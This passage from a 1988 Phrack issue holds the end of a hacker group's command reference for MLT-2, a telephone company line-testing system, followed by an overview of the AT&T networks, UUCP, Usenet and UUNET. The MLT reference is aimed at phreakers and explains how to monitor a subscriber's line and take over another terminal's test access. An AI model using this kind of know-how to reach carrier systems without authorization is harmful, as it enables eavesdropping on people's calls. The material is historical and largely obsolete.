arrangement of the pbx line circuit.  Use dtout when you need to check the
condition of special service circuits that do not use central office switches.

Full:  Test the entire telephone line

Full starts a series of tests that do an extensive analysis of the entire
line. This includes both the inside and outside portions.  Many individual
tests are run and the most important results are displayed in the summary
message. Outside, MLT checks for AC and DC faults.  Inside, it checks the line
circuit and dial tone.  The results may also include many other types of
information about the line.  You might request full line test when you first
access a line or when you need to know a lot about a line.

Grm:  Get fast ground resistance measurement

Grm gives you a quick measurement of the DC resistance of the ground path from
the strap to the test hardware.  Before you do a grm, have the repair person
strap the tip and ring wires to ground.  If this isn't done, grm will give you
incorrect values.  The line must be accessed before you do a grm request.  You
can use grm when you are talking to a repair person who is fixing a coinset.
The resistance values obtained from a grm can be compared to old resistance
values that are stored inside each coinset.

Help:  List the valid tv requests

Help returns a list of all of the valid requests used in MLT-2.  Help can be
used when you are not sure which request to use in a particular situation, or
when you can't remember an exact request name.  For example, the correct entry
to reverse polarity on a touch-tone line is "Rev.", help will tell you this.
For a description of any specific request, enter the name of the request
followed by a question mark.

Info:  Get general information about a line

Info gives you the wire center name and the location of the frame; the
exchange key, MDF group and MDF trunk numbers associated with the subscriber's
line; the telephone number at the appropriate frame; and the assignment
telephone number. You can get information about a whole telephone number, an
NPA-NXX-, or an exchange key.  MLT does not access the line when you request
info, but it keeps access if you already have it.  If there are multiple
frames in an office, MLT give you information about all of them.

Keep:  Keep an access that you already have

Keep lets you hold access to a no-test or MDF trunk that is about to
"timeout."  MLT keeps track of which trunks you have accessed but have not
used for a while.  MLT will automatically drop the access for you after a
certain period of time.  About 2 minutes before dropping the access, MLT gives
you a warning message and also highlights the status line that will be
dropped.  If you want to keep the access, you should enter "keep" in the req
field and the tn or line number of the access to be held.  To drop an access
when your are finished with it, enter an x in the req field.

Lin:  Test the inside part of the loop

Lin starts a series of tests on the inside portion of a line.  Lin includes
the same tests as the loop test and can identify a co line circuit if one is
present.  Lin does not do the regular line circuit and draw and break dial
tone tests.  An MDF access is required for a lin request.  You can use lin to
test special circuit that do not use co switching machine.  For example, if
the circuit has 2 loops connected at the frame, lin lets you look at the
second loop (both full and loop only test toward one loop).

Lloop:  Run the long loop analysis on the outside or loop part of a line

The ll request starts a series of tests which do extensive analysis of the
outside portion of the subscriber's line.  It is specifically designed to
handle cases that the regular loop request was not designed to handle.  These
cases include very long loops (over 100,000 feet) and multiparty lines on
moderate-to-very-long loops.  It does similar measurements to those that loop
does, but analyzes the results differently.  It expects to see a loop that has
no dc faults or only very light dc faults.  If you use a loop on lloop on a
loop that has serious dc faults it will not do the long loop analysis.

Loc1:  Measure distance to 1-sided resistive fault

Loc1 gets MLT to measure how far a one-sided fault is from the repair person,
because telephone lines can be very long, it can be difficult for a repair
person to find the location of a resistive fault.  You can use loc1 to help
the repair person have 1-sided fault.  You should be in contact with the
repair person on a line other than the one being measured.  Have the repair
person open the pr at a ready-access point beyond the fault if possible.  Ask
him/her to strap the pr tip to ring.  Remember to enter a temperature on the
tv mask before you transmit the loc1 request.

Loc2:  Measure distance to 2-sided resistive fault

Loc2 gets MLT to measure how far a two-sided fault is from the repair person.
Remember that you must run a locgp before you run a loc2 and that you must be
in contact with the repair-person on a line other than the one you will be
measuring.  The repair-person must connect the bad pair to the good pair in a
specific way, the exact method to use is explained in the results of the locgp
request.  Logcp and loc2 can also be used to sectionalize a one-sided
resistive fault.  Remember to enter a temperature on the tv mask before you
transmit the loc2 request.

Look:  Look for an intentional fault

Look is used to identify a fault, usually a short or ground, that has been
placed on the line by the repair person.  Look can be used when a repair
person is having trouble locating a particular line.  Look gets MLT to monitor
the line that the repair person is looking for.  When the repair person shorts
or grounds the line, mlt sends a tone to you over your headset.  You can tell
the repair person that you "see the short".  A callback path is required for a
look request.  You should talk to the repair person on a line other than the
one you are working on.

Lookin:  Look for an intentional fault on a special services line

Lookin is used to identify a fault, usually a short or ground, that has been
placed on the special services line by the technician.  Lookin is used to
locate a particular line by having MLT monitor the line that the repair person
is looking for.  When the repair person shorts or grounds the line, MLT sends
a tone to you over your headset.  You can tell the repair person that you "See
the short."  A callback path is required for a lookin quest.  You should talk
to the repair person on a line other than the one you are working on.  MDF
access is required.

Loop:  Test the outside part of the loop

Loop starts a series of tests that do an extensive analysis of the outside
portion of the line.  Loop does every test that full does except the line
circuit and draw and break dial tone tests.  Loop can be requested using
either a no-test or an MDF trunk.  A no-test access connects you to the entire
line but a loop request tests only the outside portion.  An MDF access is only
connect to the outside portion.  Use a no-test trunk when you are fairly sure
the trouble is out of the co and an MDF when you are not sure.

Lrm:  Get fast loop resistance measurement

lrm gives you a quick measurement of the DC resistance on a line.  Lrm can't
be run unless either the receiver is off-hook or the line is strapped tip to
ring (an intentional short is placed on the line by the repair person).  Also,
MLT will not accept an lrm request if there is a hard ground on the line.  Lrm
does not access the line so you must already have access to do an lrm.  You
can use lrm when you are talking to a repair person who is fixing a coinset.
The resistance values obtained from the lrm can be compared to the old
resistance values that are stored inside each coinset.

MDF(#):  Access a specific MDF trunk

MDF(#) lets you choose the MDF trunk that you want MLT to access.  Use this
request when an MDF trunk is connected to a telephone line at the MDF but is
not connected to the loop testing system.  This may occur in small offices
where the frame attendant doesn't work for the entire day.  You can also use
this request when an MDF trunk has to be tested and repaired.  The MDF entry
must be a five character entry consisting of the wire center identifier and
the trunk number.

Mdf:  Access a main distributing frame (MDF)

MDF connects the mlt testing equipment to an MDF trunk.  Before you can enter
any requests, you must have the frame attendant connect the MDF trunk to the
subscriber's line.  Remember that MLT automatically accesses a no-test trunk
unless you specifically request an MDF trunk.  An MDF trunk goes directly from
the loop testing system to the main distributing frame.  Bypassing the central
office switch.  Using an MDF trunk allows you to test loops that are connect
to co equipment that is not MLT-testable.  Also, you can sectionalize a fault
in or out of the co by testing "in" or "out" using MDF.

MDF(gr):  Access a trunk from a certain mdf trunk group

MDF(gr) lets you choose the MDF trunk group from which MLT will choose an MDF
trunk.  Use the MDF(gr) request when the NPA-NXX that you are using has more
than one frame associated with it and you can't enter cable and pair numbers.
For example, to request MDF trunk group a, you should enter MDFA in the req
field.  To find out which trunk groups are available for your NPA-NXX you can
either enter an mdf or an info request.  Remember that you still have to call
the frame attendant to have the trunk and line connected and also disconnect
when you are finished.

Mdfin:  Test the inside part of a line

Mdfin starts a series of tests that do an extensive analysis of the inside
line.  This includes line circuit and dial tone tests.  The mdfin request uses
a special line that runs from the MLT testing equipment to the MDF.  You must
ask the frame attendant to connect this line to the subscriber's line.  Then
you must enter the telephone number of this special line on the test mask
along with mdfin and the subscriber's number.  For more information see the
mdfio module in the MLT-2 user guide.

Mdfout:  Test the outside part of a line

Mdfout starts a series of tests that do an extensive analysis of the outside
line.  This includes the DC and AC tests.  The mdfout request uses a special
line that runs from the mlt testing equipment to the MDF.  You must ask the
frame attendant to connect this line to the subscriber's line.  Then you must
enter the telephone number of this special line on the test mask along with
mdfin and the subscriber's number.

Mon:  Monitor a subscriber's line

Mon lets you monitor a subscriber's line.  Sometimes you are a better judge of
whether there is noise, speech, or a recording on a line than MLT is.  If you
want to listen to a line to determine if one of these conditions does exist,
use the mon request.  You can also be automatically placed in the monitor mode
by MLT in some cases.  You will be put in monitor mode if you request ring,
talk or psr but MLT thinks the line is busy, or if you must talk to the
subscriber to run a rev, dial, or tt.  A callback number is required.  You can
request quick, look, or full while in monitor mode.

Psr:  Release a permanent signal

Psr attempts to release a permanent signal in a step-by-step central office.
A permanent signal is a steady dial tone on a line.  A frequent cause is a
receiver that is off-hook.  Psr lets you remove the permanent signal so that
you can monitor for room noise.  If when you monitor the line you still hear
steady dial tone, you should suspect permanent signal on the line.  Psr
requires a callback path between your callback line and the subscriber's line.
You should already have the callback path established before you enter a psr
request.

Qin:  Run a quick series in toward the co

Qin starts a series of tests that make a "quick" check of the loop toward the
central office.  It includes the same tests as quick.  It can also identify a
co line circuit if one is present and will report a line circuit if the DC
resistances look like one is present.  An MDF access is required for a qin
request.  You can use qin to test special switching machines.  For example, if
the circuit has 2 loops connected at the frame, qin lets you look at the 2nd
loop (both full & loop only test toward one loop).

Rev:  Identify touch-tone polarity reversals

Rev helps you identify a touch-tone polarity reversal.  On a good line, the
battery is connected to the ring wire and the ground is on the tip wire.
These wires must be connected to specific terminals on the telephone.  If they
are reversed, the subscriber will be able to receive calls but will not be
able to dial out.  If the line is reversed, you won't be able to hear the
tones before you enter a rev request.  Rev only reserves the line temporarily.
A callback path should be established before you make a rev request.

Rin:  Ring a subscriber's special services line

Rin lets you ring a telephone on a special services line.  A callback is
required.  If one doesn't exist, ring in sets one up for you.  To answer the
callback, answer its ring and press "0" on the touch-tone pad, and listen for
ringing.  When the subscriber answers, you will be placed in talk mode.  If
the line is busy, the call in progress will be interrupted.  Use rin to
contact the subscriber or a technician at the subscriber's home.  MDF access
is required to request rin.

Ring(#):  Ring a specific party on a multi-party line

Ring(#) lets you choose the telephone that you want to ring on a multiparty
line.  A multiparty line is one on which more than one subscriber is connected
to the same pair of wires.  Normally MLT checks the line records of the
telephone number you enter using the ring request, and automatically rings the
correct party.  When the line records indicate 2, 4, or 8 party, use the
ring(#) request and specify the party number in place of the "#."  If you
request ring1, MLT rings the party connected to the ring side.  If you request
ring2, MLT rings the party connected on the tip side.

Ring:  Ring a subscriber's line

Ring lets you ring a telephone on a single party line.  A callback path is
required but if one doesn't exist, ring sets one up for you.  To answer your
callback, answer its ring and press "0" on the touch-tone pad, and listen for
ringing.  When the subscriber answers, you will be placed in talk mode.  If
the line is busy or cannot be rung, you will be placed in monitor mode to
listen for noise or speech.  Use ring to contact the subscriber or a repair
person at the subscriber's home.

Ringer:  Check ringer configuration on a line

Ringer counts the number of ringers on each part of the loop (tip-ring,
tip-ground, and ring-ground).  The results tell you the number of telephones
found by MLT.  If there is a problem, the summary explains the problem.  If
you are testing a party line, some of the ringers found may belong to the
other party.

Rin:  Ring a subscriber's special services line

Rin lets you ring a telephone on a special services line.  A callback is
required.  If one doesn't exist, ring-in sets one up for you.  To answer the
callback, answer its ring and press "0" on the touch-tone pad, and listen for
ringing.  When the subscriber answers, you will be placed in talk mode.  If
the line is busy the call in progress will be interrupted.  Listen for noise
of speech.  Use rin to contact the subscriber or a technician at the
subscriber's home.  MDS is required to request rin.

Soak:  Identify swinging resistance condition

Soak identifies unstable ground faults (swinging resistance) on a line.
Voltage is applied to the line and a series of DC resistance measurements are
made to see the effect of that voltage.  If the resistance values are all low,
the fault is probably stable.  If even one value is 20% larger than the
original measurement, the fault may be unstable (swinging).  A repair person
who is dispatched may have trouble locating a swinging fault.  Use soak when
you find a 10-1000 kohm ground on a q test (full & loop include the soak
test), or just prior to dispatch to double-check a line's condition.

Ssa:  Special services access

The ssa request is used to access non-locally switched customer telephone
lines.  Accessing these lines is a  special case of a no-test trunk access.
However, if they go through a digital loop carrier such as SLC Series 5, and
there is special equipment available in the co, then you can test them with a
no-test trunk special se rvices access.  This means you don't have to call the
trunk.  The request can only be run from the stv mask.

Stv:  Special services trouble verification request

The stv request changes you from a tv mask to an stv mask.  Stv is used when
you need to test special services circuits (non-locally switched lines) served
by digital loop carrier systems such as SLC Series 5.  Switching to the stv
mask will not affect any information you left in the tv mask -- your status
lines will remain the same; however, the middle section of the mask will be
changed. Any request done from a tv mask can also be done from an stv mask,
but not vice versa.  The stv request can only be run from a tv mask.

Take:  Take control of a long-term access

Take is used when you want to transfer a long-term access from someone else's
terminal to your terminal.  To take control of a no-test access, enter the
telephone number that you want to transfer in the tn field.  To transfer an
MDF access to your terminal, enter the NPA-NXX in the tn field and the MDF
number in the space to the right of the regular tn field of the tv mask.
Finally, enter take in the req field.  If the previous holder had a callback
established, it would not be remover.  If necessary, you must remove the
callback using xcb and request a new callback to your telephone.

Talk:  Talk over the subscriber's line

Talk lets you talk to either a subscriber or a repair person on a subscriber's
line.  Talk does not ring the line so there must be someone waiting to talk to
you on the other end of the line.  A callback path is required for the talk
request but if one does not already exist, talk will set one up for you if you
have a callback number entered.  If the line is already accessed before the
talk request, MLT enters a "t" and the last 2 digits of the callback number
under the callback heading and updates the time since access.  You can request
quick, loop, or full while in talk mode.

Talkin:  Talk over the subscriber's special services line

Talkin lets you talk to a subscriber or a repair person on a special services
line.  Talkin does not ring the line so there must be someone waiting to talk
to you on the other end of the line.  A callback path is required for the
talkin request but if one does not already exist, talkin sets one up for you
if you have a callback number entered.  If the line is already accessed before
the talkin request, MLT enters a "t" and the last 2 digits of the callback
number under the callback heading and updates the time since access.  You must
have an MDF access to request talkin.

Tone+:  Use loud tone to help identify a pair

Tone+ puts a high amplitude tone on a line.  It is used on pairs that are very
long.  The extra amplitude helps the repair-person hear the tone over long
distances.  Tone is used to help a repair person to locate the correct pair in
a cable with many pairs of wires in it.  Use tone+ when a repair person
requests a tone on a very long pair.  If you have a callback on the line, it
will be placed in monitor mode.  If the status line gets brighter & you get a
changed state message, it means 1) The repair person found the pr & wants to
talk to you or 2) The subscriber has gone off-hook.

Tone:  Use tone to help craft identify a pair

Tone puts a metallic tone on a line.  There may be many pairs in a single
cable, making it difficult for a repair person to locate a specific line.  The
tone makes this job easier.  Before MLT places a tone on a line it does a
test.  The results tell you if there is a fault on the line.  If there is a
callback on the line when you request a tone, it will be placed in monitor
mode.  If the status line gets brighter and you get a changed state message,
it means either 1) The repair person found the pr & wants to talk to you or 2)
The subscriber has gone off-hook.

Toneca:  Use tone to help identify a cable

Toneca puts a longitudinal tone on a line.  This tone helps the repair person
find the cable binder group that the pair is in.  The repair person finds the
correct cable by listening for the tone.  Because the tone can be heard on
pairs other than the one you put it on, when tone or tone+ are inappropriate.
If the repair person does not have time to find the cable on the first try,
you can repeat the request.  Before placing the tone on the line, MLT does a
pretest and tells you if there is a fault on the line.

Tonein:  Use tone to help a technician identify a special services pair

Tonein puts a metallic tone on a special services line.  It may be difficult
for a technician to locate a specific line.  The tone makes this job easier.
Before MLT places a tone on a line it does a pretest.  An MDF access is
required in order to request a tonein.  If a callback is on the line when you
request tonein, it is placed in monitor mode.  If the status line gets
brighter and you get a changed state message, it means either 1) The repair
person found the pr & wants to talk to you or, 2) The subscriber has gone
off-hook.

Tt:  Test the subscriber's touch-tone pad

Tt checks a subscriber's touch-tone pad.  It analyzes the tones produced when
the subscriber presses the button before you make a tt request.  You in the
sequence 1 through 0.  You must instruct the subscriber to press the buttons
after hearing dial tone.  Mlt will signal you over your headset with two beeps
if the pad is good or one or no beeps if it is bad.  A callback path should be
established before you make a tt request.  You must use a no-test trunk access
to request it.  You can use the ring request to contact the subscriber and set
up a callback.

Tv:  Trouble verification request

The tv request changes you from an stv mask to a tv mask.  Tv is used when you
need to do interactive testing of locally switched telephone lines, or tests
using an MDF trunk.  Switching to the tv mask will not affect any information
you left in the stv mask -- your status lines will remain the same; however,
the middle section of the mask will be changed.  Any request done from a tv
mask can also be done from an stv mask, but not vice versa.  The request can
only be run from a stv mask.

Ver##:  Get definition and example of a ver code

Ver## gives you a description of the ver code that you type in place of the
##.  For example, a ver22 request will give you a definition of verification
code number 22 and an example of a typical set of test results that might
accompany a ver code of 22.  Use this request whenever you can't remember what
a certain ver code means.  MLT stores your tv mask when you request ver code
information.

Ver:  Test the entire telephone line

Ver starts a series of tests that do an extensive analysis of the entire line.
This includes both the inside and outside portions.  Many individual tests are
run but only the ver code and summary messages are displayed.  Outside, MLT
checks for AC and DC faults.  Inside, it checks the line circuit and dial
tone.

               Thanks to AT&T and the Bell Operating Companies.

                   Control C and The Tribunal of Knowledge

                If you have any questions or comments contact:

                                  Control C
                                  Jack Death
                                Prime Suspect
                                 The Prophet
                                  The Urvile

                       Or any other member of the TOK.
==============================================================================


--------------------------------------------------------------------------------


                               ==Phrack Inc.==

                     Volume Two, Issue 18, Phile #9 of 11

                     The Tribunal of Knowledge presents..

                          A Few Things About Networks
                          ===========================

                    Brought to you by  Prime Suspect (TOK)

                                June 1,  1988


   Seems like if you're into hacking you sometime or  another run into  using
networks,  whether it  be Telenet, Tymnet,  or one of the  Wide Area Networks.
One  popular Network that hackers have used for some time is Arpanet.  Arpanet
has been  around for quite a  long time.  There are changes made  to it almost
daily and  the uses  of it are much more than just logging into other systems.
Many  college  students find themselves getting acquainted  with  Bitnet these
days.  Bitnet  is SO  new compared  to other  networks that it's  got a lot of
potential left.  There is  much more  to it then just mail and file transfers.
There are  interactive uses such as the  RELAY for real-time  discussion  with
others  (equivalent  to a  CB mode)  and  another popular  use is the  network
information  center  to receive  technical files  about networking.  There are
many many mail addresses that are used for database searching, and subscribing
to electronic  magazines.  You will  find these same  uses on other  Wide Area
Networks also.  I will  give you 3  related network areas.  These three  areas
include: The AT&T company networks,  UUCP,  and  Usenet  cooperative networks.
Please  note that some  of the information I gathered for this file dated back
to 1986.  But I tried to keep it as current as possible.


AT&T (Company Network)
----------------------

   AT&T has  some internal  networks,  most of which  use internally developed
transport mechanisms.  Their most  widely used  networks are  UUCP and USENET,
which are not limited to that corporation and which  are discussed later.  All
internal AT&T networks support UUCP-style  h1!h2!h!u source routing syntax and
thus appear  to the user  to be UUCP.  Within  AT&T, UUCP  links are typically
over 1,200-bps dial-up telephone lines or Datakit (see below).
   Among AT&T's  other  networks,  CORNET is an internal  analog phone network
used by UUCP and  modems as an  alternative to  Direct Distance Dialing (DDD).
Datakit is  a circuit-switched  digital net  and is  similar  to X.25  in some
ways.  Most of Bell Laboratories is trunked together on Datakit.  On top of DK
transport  service, people run  UUCP for mail and  dkcu  for remote login.  In
addition to  host-to-host connections.  Datakit supports RS232 connections for
terminals, printers,  and hosts.  ISN is the  version of  Datakit supported by
AT&T Information Systems.  Bell Laboratories in  Holmdel, New Jersey, uses ISN
for  internal data  communication.  BLICN  (Bell Labs  Interlocation Computing
Network)  is an  IBM mainframe  RJE network dating from  the early  1970s when
Programmer's  Workbench  (PWB)  was a common  version  of the  UNIX  operating
system.  Many UNIX  machines with PWB-style RJE links use  BLICN to queue mail
and netnews for other UNIX machines.  A major  USENET host uses this mechanism
to feed  news  to about  80  neighbor hosts.  BLICN  covers  Bell Laboratories
installations  in  New Jersey,  Columbus, Ohio,  and Chicago,  and links  most
computer  center machines.  BLN (Bell Labs Network)  is an NSC Hyperchannel at
Indian Hill, Chicago.
   AT&T Internet is a TCP/IP internet.  It is not a major AT&T network, though
some of the best-known machines are on it.  There are many ethernets connected
by  TCP/IP over  Datakit.  This  internet may  soon be  connected to  the ARPA
Internet.
   ACCUNET  is AT&T's  commercial  X.25 network.  AT&T  MAIL  is a  commercial
service that is  heavily used  within  AT&T Information Systems  for corporate
internal mail.


UUCP (Cooperative Network)
--------------------------

   The name "UUCP,"  for Unix to Unix CoPy,  originally applied to a transport
service used over dial-ups between adjacent systems.  File transfer and remote
command execution were the original intent and main use of UUCP.  There was an
assumption that  any pair of communicating  machines had direct dial-up links,
that is,  that no relaying was done through intermediate machines.  By the end
of 1978,  there were  82  hosts within  Bell Laboratories  connected by  UUCP.
Though remote command execution and file transfer were heavily used,  there is
no  mention  of mail in  the standard  reference.  There was  another  similar
network of  "operational"  hosts with  UUCP links that were apparently outside
Bell  Laboratories,  but  still within  the  Bell  System.  The  two  networks
intersected at one Bell Laboratory machine.
   Both  of these  early  networks  differed  from the current UUCP network in
assuming  direct  connections  between  communicating  hosts and in not having
mail service.  The  UUCP mail network proper developed from the early networks
and spread as the UUCP programs were  distributed as part of the  Unix system.
   Remote command  execution  can be made  to work  over  successive  links by
arranging for each job in the chain to submit the next one.  There are several
programs that do this: Unfortunately, they are  all incompatible.  There is no
facility  at the  transport level for  routing beyond  adjacent systems or for
error acknowledgement.  All routing and end-to-end reliability support is done
explicitly  by  application protocols  implemented  using the  remote  command
execution facility.  There has never been any remote login facility associated
with UUCP, though the  cu  and  tip  programs are sometimes used over the same
telephone links.
   The UUCP  mail network  connects a very  diverse set of machines and users.
Most of the host  machines run the  UNIX  operating  system.  Mail is the only
service provided  throughout the  network.  In addition  to the  usual uses of
mail,  much  traffic  is  generated as  responses to  USENET  news.  The  same
underlying   UUCP   transport   mechanisms  are  also  used  to  support  much
of USENET.
   The UUCP  mail network has many problems with routing (it is one of the few
major networks that uses source routing)  and with its scale.  Nonetheless, it
is extremely popular and still growing rapidly.  This is attributable to three
circumstances:  ease of connection,  low cost, and its close relationship with
the USENET news network.
   Mailing lists  similar  to those  long current on the ARPANET have recently
increased in popularity on the UUCP mail network.  These permit a feature that
USENET  newsgroups  cannot  readily  supply:  a  limitation  on  access  on  a
per-person basis.  Also,  for low-traffic  discussions  mailing lists are more
economical,  since traffic  can be directed  to individuals according to their
specific interests.
   There  is no  central administration.  To connect  to the network, one need
only  find one machine that will  agree to be a neighbor.  For people at other
hosts to be able to  find your host,  however,  it is good to be registered in
the UUCP map,  which is  kept by the  group of  volunteers  known as  the UUCP
Project.  The map is posted monthly in the USENET  newsgroup "comp.mail.maps".
There is a directory of  personal addresses on the UUCP network, although this
is a commercial venture unrelated to the UUCP Project.
   Each host pays for it's own links;  some hosts  encourage others to connect
to them in order to shorten mail delivery paths.
   There is no clear distinction between transport and network layers in UUCP,
and there is  nothing  resembling an  Internet  Protocol.  The details  of the
transport protocol  are undocumented  (apparently not  actually proprietary to
AT&T,  contrary to rumor,  though the source code that implements the protocol
and is distributed with UNIX is AT&T's trade secret).
   Mail is  transferred by submitting  a mail command over a direct connection
by the  UUCP  remote command  execution mechanism.  The arguments  of the mail
command  indicate whether  the mail is to be  delivered locally on that system
or resubmitted  to another system.  In the  early days, it  was  necessary  to
guess the  route to a given  host and hope.  The only method of acknowledgment
was to  ask the  addressee to reply.  Now  there is a program (pathalias) that
can compute  reasonable routes  from the  UUCP map, and there is software that
can automatically look up those routes for users.
   The UUCP mail  network is  currently supported  in North America  mostly by
dial-up  telephone links.  In Europe  there is  a closely  associated  network
called EUnet, and in Japan there is JUNET.
   The most  common  dial-up link  speed on the UUCP mail network is 1,200 bps
though  there  are  still  a few  300-bps  links,  and  2,400 bps  is becoming
more popular.  Actually,  now I believe  that 1200-bps  is still very  common,
but 2400  may be just as common,  and 9600-bps  is much more common  than ever
thought it would be in 1986.  There are  also many  sites that  use 19,200-bps
for  using  UUCP.  When  systems are very close, they are sometimes  linked by
dedicated  lines, often  running at  9,600 bps.  Some UUCP  links are run over
local-area networks such as ethernets, sometimes on top of TCP/IP (though more
appropriate  protocols than  UUCP are usually  used over such transport media,
when UUCP is used it's usual point-to-point error  correction code is bypassed
to take advantage of the reliability of the  underlying network and to improve
bandwidth).  Some such links even exist on long-haul packet networks.
   The widespread  use of  more sophisticated  mail relay  programs  (such  as
sendmail and  MMDF) has  increased  reliability.  Still, there  are many hosts
with none of  these new  facilities,  and the  sheer size of the network makes
it unwieldly.
   The UUCP mail  network has  traditionally used  source code  routing with a
syntax like hosta!hostb!hostc!host!user.  The UUCP map and pathalias have made
this bearable, but it is still a nuisance.  An effort is underway to alleviate
the routing  problems by  implementing naming  in the  style of  ARPA Internet
domains.  This  might  also allow  integration  of the  UUCP name  space  into
the ARPA Internet domain name  space.  In fact there  is now an ATT.COM domain
in which most hosts are only on UUCP or CSNET.  Most UUCP hosts are not yet in
any Internet domain, however.  This domain effort is also handled  by the UUCP
Project and appears to be proceeding at a methodical but persistent pace.
   The hardware  used in  the UUCP  mail network  ranges from  small  personal
computers  through  workstations  to  minicomputers,   mainframes  and  super-
computers.  The network extends throughout  most of North America and parts of
Asia (Korea  and  Israel).  Including hosts  on the related networks JUNET (in
Japan) and  EUnet (in Europe),  there are at least 7,000 hosts on the network;
possibly 10,000 or more.  (EUnet and JUNET hosts are listed in the UUCP maps.)
The UUCP Project addresses are:

uucp-query@cbatt.ATT.COM
cbatt!uucp-query
uucp-query@cbatt.UUCP

       Much information about UUCP is published in USENET newsgroups.


USENET (Cooperative Network)
----------------------------

   USENET began  in 1980  as a medium  of communication  between  users of two
machines,  one  at  the  University  of  North Carolina,  the  other  at  Duke
University.  It has since grown exponentially to its current size of more than
2000 machines.  In the process, the software has been rewritten several times,
and the  transport  mechanisms  now used  to support  it include  not only the
original UUCP links, but also X.25, ACSNET, and others.
   USENET combines  the idea of mailing lists as long used on the ARPANET with
bulletin-board service such as has existed for many years on TOPS-20 and other
systems,  adding a  freedom of  subject  matter that  could never exist on the
ARPANET,  and reaching a more varied constituency.  While  chaotic  and  inane
ramblings abound, the network is quite popular.
   The  USENET news network  is a  distributed  computer  conferencing  system
bearing some similarities to commercial conferencing  systems like CompuServe,
though  USENET is  much more  distributed.  Users pursue  both  technical  and
social  ends  on USENET.   Exchanges are  submitted to  newsgroups on  various
topics, ranging from gardening to astronomy.
   The name "USENET"  comes from the USENIX Association.  The Professional and
Technical UNIX User's Group.  The name UNIX is a pun on Multics,  which is the
name  of a major  predecessor operating  system.  (The pun indicates that,  in
areas where Multics tries to do many things, UNIX tries to do one thing well.)
USENET has  no central  administration,  though there  are newsgroups to which
introductory  and other  information about  the  network  is  posted  monthly.
USENET  is  currently  defined as  the set  of hosts  receiving the  newsgroup
news.announce.  There are about  a dozen hosts that constitute the backbone of
the network,  keeping transit  times low by  doing  frequent  transfers  among
themselves and with other  hosts that  they feed.  Since these hosts bear much
of the burden of the network, their administrators tend to take a strong
interest  in the  state of  the network.  Most newsgroups  can be posted to by
anyone on  the network.  For others, it is necessary to mail a submission to a
moderator,  who decides whether  to post it.  Most moderators  just filter out
redundant  articles, though  some make  decisions  on  other  grounds.   These
newsgroup  moderators  form  another  group  interested  in  the  state of the
network.  Newsgroups  are created  or deleted  according to the decisions made
after the discussion in the newsgroup "news.groups".
   Each host  pays its  own telephone  bills.  The  backbone hosts have higher
bills than most other hosts due to their long-distance links among themselves.
The unit  of communication is  the news  article.  Each  article is  sent by a
flooding routing  algorithm to all  nodes on the network.  The transport layer
is UUCP for most  links, although  many others  are used, including ethernets,
berknets, and long-haul packet-switched networks; sometimes UUCP is run on top
of the others, and sometimes UUCP is not used at all.
   The many  problems with  USENET  (e.g. reader overload,  old software, slow
propagation speed, and high and unevenly  carried costs of transmission)  have
raised the possibility of  using the experience  gained in  USENET to design a
new  network to  replace it.  The  new network  might also  involve at least a
partial replacement for the UUCP mail network.
   One unusual mechanism that has been  proposed to support the new network is
stargate.   Commercial  television   broadcasting  techniques   leave   unused
bandwidth in  the vertical  blanking  interval  between picture  frames.  Some
broadcasters  are currently using this part of the signal to transmit Teletext
services.   Since   many   cable-television   channels   are  distributed  via
geo-synchronous satellites, a single input to a satellite  uplink facility can
reach all of  North America  on  an  appropriate  satellite  and  channel.   A
satellite uplink  company interested  in allowing  USENET-like articles  to be
broadcast  by  satellite on  a well-known  cable-television  channel has  been
found.  Prototypes of hardware  and software to encode  the articles and other
hardware to decode them  from a  cable-television  signal have  been built and
tested in  the field for  more than  a year.  A new, reasonably price model of
the decoding box may be available soon.
   This  facility would  allow most  compatible systems  within the  footprint
(area of coverage)  of the satellite and with access to the appropriate cable-
television channel to obtain decoding equipment and hook into the network at a
very reasonable cost.  Articles  would be submitted  for transmission by  UUCP
links to  the satellite  uplink  facility.  Most of the technical  problems of
Stargate seem to have been solved.
   More than  90 percent of all  USENET articles reach 90 percent of all hosts
on the network within  three days.  Though  there have  been some  famous bugs
that caused loss of articles, that particular problem has become rare.
   Every  USENET host  has a name.  That host  name and the name of the poster
are used to identify the source of an article.  Though those hosts that are on
both the UUCP mail and USENET news networks usually have the same name on both
networks, mail addresses  have no meaning  on USENET:  Mail related to  USENET
articles is usually sent via  UUCP mail;  it cannot be  sent over  USENET,  by
definition.  Though  the two networks have  always been closely related, there
are many more  hosts on UUCP than on USENET.  In Australia the two networks do
not even intersect except at one host.
   There  are  different  distributions  of  newsgroups  on  USENET.  Some  go
everywhere,  whereas  others are  limited to a  particular  continent, nation,
state or province, city,  organization, or even machine, though the more local
distributions  are not  really part  of USENET  proper.  The  European network
EUnet carries some  USENET newsgroups  and has another set of it's own.  JUNET
in Japan is similar to EUnet in this regard.
   There are about 2000  USENET hosts in the United States, Canada, Australia,
and  probably  in  other  countries.  The  hosts  on  EUnet,  SDN,  and  JUNET
communicate  with USENET hosts:  The total number of news hosts including ones
on those  three networks  is probably  at least  2500.  The  UUCP map includes
USENET  map  information  as  annotations.   A  list  of  legitimate   netwide
newsgroups  is  posted  to   several  newsgroups   monthly.   Volunteers  keep
statistics  on the  use of  the various  newsgroups (all  250 of  them) and on
frequency of posting by persons and hosts.  These are posted to news.newslists
once  a month, as  is the list  of  newsgroups.  Important  announcements  are
posted  to  moderated  newsgroups, news.announce  and  news.announce.newusers,
which are  intended to  reach all users (the current moderator is Mark Horton,
cbosgd!mark).  An address for information on the network is
seismo!usenet-request.



News on UUNET - June 1988
-------------------------

   A year ago,  UUNET (Fairfax, VA)  was formed to help ease the communication
load  of  the  beleaguered Usenet  network of  UNIX users.  Usenet connections
were becoming  increasingly costly and difficult to maintain, a situation that
prompted  the   Usenix  Association   to  fund  the  creation  of  the   UUNET
Communications Service  to assist users in accessing  Usenet.  Now,  UUNET has
become  the  "best connected"  UNIX  computer  in  the  world,  and  has  been
authorized to function as an Arpanet mail gateway.  Gateways to other networks
are expected to be established in the future.


   I guess  all use  of  UUNET  is done through the UUCP program found on Unix
operating systems.  Many people are  getting PC versions of the Unix Operating
system now-a-days,  so knowing  what's  available  before  getting hooked into
a network,  if that's your plan,  is advised.  There is an advertisement about
UUNET  on Bix  in the  networks conference somewhere.  The message may be old,
but still useful.

The cost of using UUNET is:  $30/month...  and $2/hour.  I  think  the  hourly
charge may only apply if connecting through Tymnet.  Not sure.

Accessible via Tymnet, their 800 number, or a regular local POTS number.

Connections can definitely  be made  up to  9600 baud.  19.2K baud  access may
also exist.  I think it does.

   If you're a UUNET user,  and want  to receive mail from someone through the
UUCP network,  they would  address it  just as any  other  UUCP mail  address.
An example is:   ...uunet!warble!joeuser

------------------------------------------------------------------------------
